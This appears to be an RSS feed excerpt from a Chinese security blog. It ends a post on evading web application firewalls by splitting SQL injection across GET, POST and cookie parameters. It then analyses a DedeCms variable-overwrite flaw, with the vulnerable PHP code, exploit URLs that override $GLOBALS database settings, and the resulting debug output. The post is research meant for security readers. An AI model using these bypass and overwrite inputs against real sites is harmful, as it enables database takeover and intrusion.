<p>发送一个POST包，GET,POST,COOKIE三个方法中都带有不同的t参数内容<br />
———————————————–<br />
POST http://192.168.239.129/1.aspx?t=1 HTTP/1.1<br />
Host: 192.168.239.129<br />
Cookie: t=2</p>
<p>t=3<br />
———————————————–</p>
<p>结果返回<br />
Request:1,3,2</p>
<p>最后得出结论，Request.Params方法接收的数据是按照GPC顺序整合，看到这里的同学再联想到0×02的复参攻击应该如醍醐灌顶了，我们可以将SQL攻击语句拆分到GET,POST,COOKIE三个变量里进行组合攻击。想一想WAF针对这种高级复参攻击是否防御好了？</p>
<p>0×04 后话</p>
<p>WAF是不可能解决所有安全问题的，本文的思路归其本源实际上是描叙了WAF处理HTTP包与服务端处理HTTP包数种差异。互联网是不断更新迭代的，差异存在，类似的漏洞也会存在。<br />
本文提到了三种绕过WAF的思路，第一种是我的原创属于0DAY状态，第二种是参考已有的复参攻击，其中第三种高级复参攻击是由Safe3同学提出的，本文也是与Safe3同学讨论他开发的WAF的BUG而来，所以感谢Safe3同学。<br />
另外请大家不要将本文的内容用于非法途径，仅供安全人员参考，谢谢。</p>
<p>参考：<br />
[1].http://www.faqs.org/rfcs/rfc2616.html<br />
[2].http://www.w3school.com.cn/asp/asp_ref_request.asp<br />
[3].http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf<br />
[4].http://msdn.microsoft.com/en-us/library/system.web.httprequest.aspx</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DedeCms 漏洞为什么能覆盖数据库配置变量</title>
		<link>http://www.0x50sec.org/dedecms-%e4%b8%ba%e4%bb%80%e4%b9%88%e8%83%bd%e8%a6%86%e7%9b%96%e6%95%b0%e6%8d%ae%e5%ba%93%e9%85%8d%e7%bd%ae%e5%8f%98%e9%87%8f/</link>
		<comments>http://www.0x50sec.org/dedecms-%e4%b8%ba%e4%bb%80%e4%b9%88%e8%83%bd%e8%a6%86%e7%9b%96%e6%95%b0%e6%8d%ae%e5%ba%93%e9%85%8d%e7%bd%ae%e5%8f%98%e9%87%8f/#comments</comments>
		<pubDate>Wed, 31 Aug 2011 04:17:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[漏洞代码]]></category>
		<category><![CDATA[DEDECMS]]></category>
		<category><![CDATA[GLOBALS]]></category>
		<category><![CDATA[变量覆盖]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1164</guid>
		<description><![CDATA[这件事说来比较惭愧，之前发现Dedecms有这么一个严重的问题，也传言dede不用登击进后台. 在网上也考到mr_xhming同学的分析: http://hi.baidu.com/mr_xhming/blog/item/5e6d6009d44b1f39e92488a5.html 底下还有大牛的评论 2009-06-14 00:01 &#124; 回复 在文件common.inc.php先覆盖 $GLOBALS['cfg_dbhost']; $GLOBALS['cfg_dbuser']; $GLOBALS['cfg_dbpwd']; $GLOBALS['cfg_dbname']; $GLOBALS['cfg_dbprefix']; 然后才是初始化数据库类 //引入数据库类 require_once(DEDEINC.&#8217;/dedesql.class.php&#8217;); //全局常用函数 require_once(DEDEINC.&#8217;/common.func.php&#8217;); ?&#62; 当时我也纳闷，DedeCms变量覆盖漏洞为什么能覆盖数据库配置变量？因为覆盖(或者说创建)在前，赋值在后啊。 //include/common.inc.php function _RunMagicQuotes(&#38;$svar) { if(!get_magic_quotes_gpc()) { if( is_array($svar) ) { foreach($svar as $_k =&#62; $_v) $svar[$_k] = _RunMagicQuotes($_v); } else { $svar = addslashes($svar); } } return $svar; } if (!defined('DEDEREQUEST')) { //检查和注册外部提交的变量 foreach($_REQUEST [...]]]></description>
			<content:encoded><![CDATA[<p>这件事说来比较惭愧，之前发现Dedecms有这么一个严重的问题，也传言dede不用登击进后台.</p>
<p>在网上也考到mr_xhming同学的分析:</p>
<p>http://hi.baidu.com/mr_xhming/blog/item/5e6d6009d44b1f39e92488a5.html</p>
<p>底下还有大牛的评论</p>
<p><span style="color: #ff0000;">2009-06-14 00:01 | 回复</span></p>
<div>
<p><span style="color: #ff0000;">在文件common.inc.php先覆盖 </span></p>
<p><span style="color: #ff0000;">$GLOBALS['cfg_dbhost'];</span><br />
<span style="color: #ff0000;">$GLOBALS['cfg_dbuser'];</span><br />
<span style="color: #ff0000;">$GLOBALS['cfg_dbpwd'];</span><br />
<span style="color: #ff0000;">$GLOBALS['cfg_dbname'];</span><br />
<span style="color: #ff0000;">$GLOBALS['cfg_dbprefix']; </span></p>
<p><span style="color: #ff0000;">然后才是初始化数据库类 </span></p>
<p><span style="color: #ff0000;">//引入数据库类</span><br />
<span style="color: #ff0000;">require_once(DEDEINC.&#8217;/dedesql.class.php&#8217;); </span><br />
<span style="color: #ff0000;">//全局常用函数</span><br />
<span style="color: #ff0000;">require_once(DEDEINC.&#8217;/common.func.php&#8217;); </span><br />
<span style="color: #ff0000;">?&gt;</span></p>
</div>
<p>当时我也纳闷，DedeCms变量覆盖漏洞为什么能覆盖数据库配置变量？因为覆盖(或者说创建)在前，赋值在后啊。</p>
<p>//include/common.inc.php</p>
<p><span style="color: #ff0000;">function _RunMagicQuotes(&amp;$svar)</span><br />
<span style="color: #ff0000;">{</span><br />
<span style="color: #ff0000;"> if(!get_magic_quotes_gpc())</span><br />
<span style="color: #ff0000;"> {</span><br />
<span style="color: #ff0000;"> if( is_array($svar) )</span><br />
<span style="color: #ff0000;"> {</span><br />
<span style="color: #ff0000;"> foreach($svar as $_k =&gt; $_v) $svar[$_k] = _RunMagicQuotes($_v);</span><br />
<span style="color: #ff0000;"> }</span><br />
<span style="color: #ff0000;"> else</span><br />
<span style="color: #ff0000;"> {</span><br />
<span style="color: #ff0000;"> $svar = addslashes($svar);</span><br />
<span style="color: #ff0000;"> }</span><br />
<span style="color: #ff0000;"> }</span><br />
<span style="color: #ff0000;"> return $svar;</span><br />
<span style="color: #ff0000;">}</span></p>
<p><code>if (!defined('DEDEREQUEST'))<br />
{<br />
//检查和注册外部提交的变量<br />
foreach($_REQUEST as $_k=&gt;$_v)<br />
{<br />
if( strlen($_k)&gt;0 &amp;&amp; preg_match('/^(cfg_|GLOBALS)/',$_k) )<br />
{<br />
exit('Request var not allow!');<br />
}<br />
}<br />
foreach(Array('_GET','_POST','_COOKIE') as $_request)<br />
{<br />
<span style="color: #ff0000;"> foreach($$_request as $_k =&gt; $_v) ${$_k} = _RunMagicQuotes($_v);  <strong>//这里覆盖变量</strong></span><br />
<span style="color: #ff0000;"> }</span><br />
}</code></p>
<p>//系统相关变量检测<br />
if(!isset($needFilter))<br />
{<br />
$needFilter = false;<br />
}<br />
$registerGlobals = @ini_get(&#8220;register_globals&#8221;);<br />
$isUrlOpen = @ini_get(&#8220;allow_url_fopen&#8221;);<br />
$isSafeMode = @ini_get(&#8220;safe_mode&#8221;);<br />
if( preg_match(&#8216;/windows/i&#8217;, @getenv(&#8216;OS&#8217;)) )<br />
{<br />
$isSafeMode = false;<br />
}</p>
<p>//Session保存路径<br />
$sessSavePath = DEDEDATA.&#8221;/sessions/&#8221;;<br />
if(is_writeable($sessSavePath) &amp;&amp; is_readable($sessSavePath))<br />
{<br />
session_save_path($sessSavePath);<br />
}</p>
<p>//系统配置参数<br />
require_once(DEDEDATA.&#8221;/config.cache.inc.php&#8221;);</p>
<p>//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数<br />
if($_FILES)<br />
{<br />
require_once(DEDEINC.&#8217;/uploadsafe.inc.php&#8217;);<br />
}</p>
<p>//数据库配置文件<br />
<span style="color: #ff0000;">require_once(DEDEDATA.&#8217;/common.inc.php&#8217;);        //这里引入数据库配置文件</span><br />
&#8230;</p>
<p>//data/common.inc.php 里面的内容</p>
<p>&lt;?php<br />
//数据库连接信息<br />
$cfg_dbhost = &#8216;localhost&#8217;;<br />
$cfg_dbname = &#8216;de2&#8242;;<br />
$cfg_dbuser = &#8216;root&#8217;;<br />
$cfg_dbpwd = &#8221;;<br />
$cfg_dbprefix = &#8216;dede_&#8217;;<br />
$cfg_db_language = &#8216;utf8&#8242;;</p>
<p>?&gt;</p>
<p>&nbsp;</p>
<p>看起来的样子是就算覆盖了$cfg_dbname这些变量但是后面的文章又给$cfg_dbname赋了值。</p>
<p>然后我以为只有那些系统变量在覆盖前没初始化的才可以覆盖利用，但是我利用这个漏洞是通过别的途径，运气好点也能搞到shell。当时根本没看懂fly大牛的评论(这个漏洞人家09年的时候就已经公布出来了？但是08年是利用$_FILES数组覆盖的。）当时网上爆的Dedecms的变量覆盖是$_FILES数组,其实除了这个还有更严重的，很多人都发现了但是没人爆出了，因为爆出来就没得玩了。但是Dedecms那帮家伙只知道修修补补，补了那个变量覆盖的时候就在旁边的更明显的都没发现。现在他们补了这个漏洞，还是有些别的严重的问题他们还是没补完。</p>
<p>扯的有点多，关键的问题还没解决。变量覆盖是存在的，但是怎么利用还不知道。</p>
<p>问题的根本就是: <strong><span style="color: #ff0000;">$cfg_dbname和$GLOBALS['cfg_dbname']到底是不是一回事？</span></strong><br />
我原来想当然的以为是一回事，其实根本不是那么回事。</p>
<p>我们可以做个实验：</p>
<p>把include/common.inc.php添加几行代码看一下：</p>
<p><code>echo '---------------------------------------------------------&lt;/br&gt;';<br />
echo '$GLOBALS[cfg_dbname]:';<br />
var_dump($GLOBALS[cfg_dbname]);<br />
echo '---------------------------------------------------------&lt;/br&gt;';<br />
echo '$cfg_dbname';<br />
var_dump($cfg_dbname);<br />
//数据库配置文件<br />
echo '++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;/br&gt;';<br />
<span style="color: #ff0000;"><strong>require_once(DEDEDATA.'/common.inc.php');</strong></span><br />
echo '---------------------------------------------------------&lt;/br&gt;';<br />
echo '$GLOBALS[cfg_dbname]:';<br />
var_dump($GLOBALS[cfg_dbname]);<br />
echo '---------------------------------------------------------&lt;/br&gt;';<br />
echo '$cfg_dbname';<br />
var_dump($cfg_dbname);<br />
exit;</code></p>
<p>&nbsp;</p>
<p>提交 http://127.0.0.1/de2/index.php?_POST[cfg_dbname]=1234</p>
<p>结果如下：</p>
<pre>---------------------------------------------------------
$GLOBALS[cfg_dbname]:
<small>string</small> <span style="color: #cc0000;">'1234'</span> <em>(length=4)</em>
---------------------------------------------------------

$cfg_dbname
<small>string</small> <span style="color: #cc0000;">'1234'</span> <em>(length=4)</em>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++

---------------------------------------------------------
$GLOBALS[cfg_dbname]:
<small>string</small> <span style="color: #cc0000;">'de2'</span> <em>(length=3)</em>
---------------------------------------------------------

$cfg_dbname
<small>string</small> <span style="color: #cc0000;">'de2'</span> <em>(length=3)</em>
</pre>
<p>提交:http://127.0.0.1/de2/index.php?_POST<strong><span style="color: #ff0000;">[GLOBALS]</span></strong>[cfg_dbname]=1234</p>
<pre>
---------------------------------------------------------
$GLOBALS[cfg_dbname]:

<small>string</small> <span style="color: #cc0000;">'1234'</span> <em>(length=4)</em>
---------------------------------------------------------

$cfg_dbname
<span style="color: #3465a4;">null</span>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++

---------------------------------------------------------
$GLOBALS[cfg_dbname]:
<small>string</small> <span style="color: #cc0000;">'1234'</span> <em>(length=4)</em>
---------------------------------------------------------

$cfg_dbname
<small>string</small> <span style="color: #cc0000;">'de2'</span> (length=3)
</pre>
<p>现在发现得到了我们想要的结果了，因为其后引入的数据库类</p>
<pre>
if ($GLOBALS['cfg_mysql_type'] == 'mysqli' &amp;&amp; function_exists("mysqli_init"))

{
 require_once(DEDEINC.'/dedesqli.class.php');

} else {

 require_once(DEDEINC.'/dedesql.class.php');

}
</pre>
<p>里面的初始化函数是这样的，用的$GLOBALS['cfg_dbname']变量完成的赋值。</p>
<pre>
function Init($pconnect=FALSE)
{
$this-&gt;linkID = 0;
$this-&gt;queryString = '';
$this-&gt;parameters = Array();
$this-&gt;dbHost   =  $GLOBALS['cfg_dbhost'];
$this-&gt;dbUser   =  $GLOBALS['cfg_dbuser'];
$this-&gt;dbPwd    =  $GLOBALS['cfg_dbpwd'];
$this-&gt;dbName   =  $GLOBALS['cfg_dbname'];
$this-&gt;dbPrefix =  $GLOBALS['cfg_dbprefix'];
$this-&gt;result["me"] = 0;
$this-&gt;Open($pconnect);
}
</pre>
<p><strong><span style="color: #ff0000;"><br />
所以是可以覆盖的，因为$GLOBALS数组被覆盖后变成了一个普通数组(不再是PHP的超全局变量),$GLOBALS['cfg_dbname'] 并不再等同于$cfg_dbname .我原来也是认为一直等同的。</p>
<p></span></strong></p>
<p><strong><span style="color: #ff0000;">而Dedecms的数据库配置文件用的是$GLOBALS['cfg_dbname']变量。</span></strong></p>
<p>经foreach循环覆盖$GLOBALS之后导致$GLOBALS不再是超全局变量了，他成了普通的数组了，所以$GLOBALS['cfg_dbname'] 不再等同于$cfg_dbname 这是问题的关键.<br />
证明代码如下</p>
<pre>
< ?php
$_POST['GLOBALS']['cfg_dbname'] = '123';
var_dump($GLOBALS);
foreach($_POST as $k => $v)
{
$$k=$v;
}
echo '~~~~~~~~~~~~~~~~~~~~~~';
echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];
echo '+++++++++++++++++++++++';
var_dump($GLOBALS);
$cfg_dbname = '456';
echo '-----------------------';
echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];
?>
</pre>
<p>结果如下</p>
<pre>
array
  'GLOBALS' =>
    &#038;array
  'HTTP_HOST' => string '127.1' (length=5)
  'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)
  'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)
  'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)
  'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)
  'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)
  'HTTP_KEEP_ALIVE' => string '115' (length=3)
  'HTTP_CONNECTION' => string 'keep-alive' (length=10)
  'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)
  'SystemRoot' => string 'C:\Windows' (length=10)
  'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)
  'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)
  'WINDIR' => string 'C:\Windows' (length=10)
  'SERVER_SIGNATURE' => string '' (length=0)
  'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)
  'SERVER_NAME' => string '127.1' (length=5)
  'SERVER_ADDR' => string '127.0.0.1' (length=9)
  'SERVER_PORT' => string '80' (length=2)
  'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)
  'REMOTE_ADDR' => string '127.0.0.1' (length=9)
  'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)
  'SERVER_ADMIN' => string 'admin@localhost' (length=15)
  'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)
  'REMOTE_PORT' => string '53482' (length=5)
  'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)
  'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)
  'REQUEST_METHOD' => string 'GET' (length=3)
  'QUERY_STRING' => string '' (length=0)
  'REQUEST_URI' => string '/5.php' (length=6)
  'SCRIPT_NAME' => string '/5.php' (length=6)
  'PHP_SELF' => string '/5.php' (length=6)
  'REQUEST_TIME' => int 1314794715
  '_POST' =>
    array
      'GLOBALS' =>
        array
          'cfg_dbname' => string '123' (length=3)
  '_GET' =>
    array
      empty
  '_COOKIE' =>
    array
      empty
  '_SERVER' =>
    array
      'HTTP_HOST' => string '127.1' (length=5)
      'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)
      'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)
      'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)
      'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)
      'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)
      'HTTP_KEEP_ALIVE' => string '115' (length=3)
      'HTTP_CONNECTION' => string 'keep-alive' (length=10)
      'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)
      'SystemRoot' => string 'C:\Windows' (length=10)
      'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)
      'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)
      'WINDIR' => string 'C:\Windows' (length=10)
      'SERVER_SIGNATURE' => string '' (length=0)
      'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)
      'SERVER_NAME' => string '127.1' (length=5)
      'SERVER_ADDR' => string '127.0.0.1' (length=9)
      'SERVER_PORT' => string '80' (length=2)
      'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)
      'REMOTE_ADDR' => string '127.0.0.1' (length=9)
      'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)
      'SERVER_ADMIN' => string 'admin@localhost' (length=15)
      'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)
      'REMOTE_PORT' => string '53482' (length=5)
      'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)
      'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)
      'REQUEST_METHOD' => string 'GET' (length=3)
      'QUERY_STRING' => string '' (length=0)
      'REQUEST_URI' => string '/5.php' (length=6)
      'SCRIPT_NAME' => string '/5.php' (length=6)
      'PHP_SELF' => string '/5.php' (length=6)
      'REQUEST_TIME' => int 1314794715
  '_ENV' =>
    array
      empty
  '_FILES' =>
    array
      empty
  '_REQUEST' =>
    array
      empty

~~~~~~~~~~~~~~~~~~~~~~
:123
+++++++++++++++++++++++

array
  'cfg_dbname' => string '123' (length=3)

-----------------------
456:123
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/dedecms-%e4%b8%ba%e4%bb%80%e4%b9%88%e8%83%bd%e8%a6%86%e7%9b%96%e6%95%b0%e6%8d%ae%e5%ba%93%e9%85%8d%e7%bd%ae%e5%8f%98%e9%87%8f/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>

